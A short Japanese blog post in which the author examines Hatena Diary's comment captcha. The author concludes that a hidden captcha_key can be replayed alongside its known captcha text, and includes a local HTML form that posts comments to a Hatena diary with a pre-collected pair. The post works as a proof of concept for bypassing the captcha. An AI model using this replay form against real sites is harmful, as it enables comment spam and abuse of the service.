Captcha
というわけで、いろいろ試してみました。調べてみたのが、captchaを突破してスパムコメントを投稿するのが可能なのかどうか。
とりあえずの結論として、はてなに特化すれば可能。
HTMLのソースコードを見るとcaptcha_keyというフィールドが隠してあってそこに、ハッシュのようなキーが書いてある。状況から考えて、これは可逆のはずだからハッシュじゃないけど。
<input class="" name="captcha_key" value="5d5c9e7863f3767b0b0bfe2a83aa0269_1172801003" type="hidden"><br> <input value="投稿" type="submit"></p>
で、ユーザが入力した"da4121"のような文字列を暗号化して、これと一致するかを調べているはず。
ということは、あらかじめcaptchaに書かれた文字と、captcha_keyのペアを調べておいて、コメントするたびにそいつを渡してやれば良い。
というわけで、これらをもとにローカルから投稿できるHTMLを書いてみた。
<form method="post" action="http://d.hatena.ne.jp/mzp/comment"> <input name="mode" value="enter" type="hidden"> <input name="rkm" value="" type="hidden"> <input name="date" value="20070302" type="hidden"> <input name="username" size="15" value="name"><br> <textarea name="body" value="" cols="60" rows="3"></textarea> <input name="captcha_code" size="10" value="1d0da3" type="text"> <input name="captcha_key" value="bd9c8664bc3c35cb063a454f6f738e8e_1172801775"><br> <input type="submit"></p> </form>
# 他のcaptchaもこんな感じなのかしら。